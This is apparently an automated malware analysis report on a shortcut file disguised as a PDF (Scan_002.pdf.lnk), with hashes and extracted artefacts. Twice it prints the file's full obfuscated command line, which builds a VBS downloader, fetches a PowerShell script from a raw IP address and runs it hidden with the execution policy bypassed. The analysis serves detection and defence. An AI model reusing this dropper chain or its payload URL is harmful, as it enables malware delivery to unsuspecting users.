Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
5b0b33dbfa6153308dc7009a4188a0fd
Sha1
0832c5c468e75702284062c2005d7540ba022aa6
Sha256
9698e5693c96919a8b00c9dd3ed8e7d6b3ff619cb1fdda898151185bc8e4fd67
Sha384
6250b46e9522b926dc16fe9b0df98f609504daada39d2fa8266b384050074a1f5186f475702a0bf667402ac7f888f4a4
Sha512
6701bd1fc34cd73f484e3720aa6794015ad4a95fa7d1520cf663800e5a1402eb897b363cb5bd685c51a2111e7dc70c31fae0c6e0261de84ba3bf3617e0c9fecc
SSDeep
24:8d/Cf3DwdfCPiXnSpVT6ADABxb1En9ZdcMjdoRrCUJd:8lCPkdf1XnSpEs4b1Ug/
TLSH
1872CE8125E80310F2F6FF39CA7BAB45053BBA80ED31C75C8D508C4C1954A41EDB1F66
File Structure
Scan_002.pdf.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary].deobfuscated.vbs
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/adhesivewipe.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ipu9.ps1",2 > %TEMP%\LM.vbs && cscript //b %TEMP%\LM.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ipu9.ps1 & del %TEMP%\LM.vbs"
URLs in VB Code - #1

http://193.169.194.40/S7yhd67/adhesivewipe.ps1
Deobfuscated PowerShell

& Remove-Item "%TEMP%\LM.vbs IconLocation: imageres.dll"
Deobfuscated PowerShell

& Remove-Item "%TEMP%\LM.vbs"
Scan_002.pdf.lnk (16.24 KB)
File Structure
Scan_002.pdf.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary].deobfuscated.vbs
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/adhesivewipe.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ipu9.ps1",2 > %TEMP%\LM.vbs && cscript //b %TEMP%\LM.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ipu9.ps1 & del %TEMP%\LM.vbs"

Malicious

Scan_002.pdf.lnk
URLs in VB Code - #1

http://193.169.194.40/S7yhd67/adhesivewipe.ps1

Scan_002.pdf.lnk > [Lnk Summary]
Deobfuscated PowerShell

& Remove-Item "%TEMP%\LM.vbs IconLocation: imageres.dll"

Malicious

Scan_002.pdf.lnk > [Lnk Summary] > [PowerShell Command]
Deobfuscated PowerShell

& Remove-Item "%TEMP%\LM.vbs"

Malicious

Scan_002.pdf.lnk > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙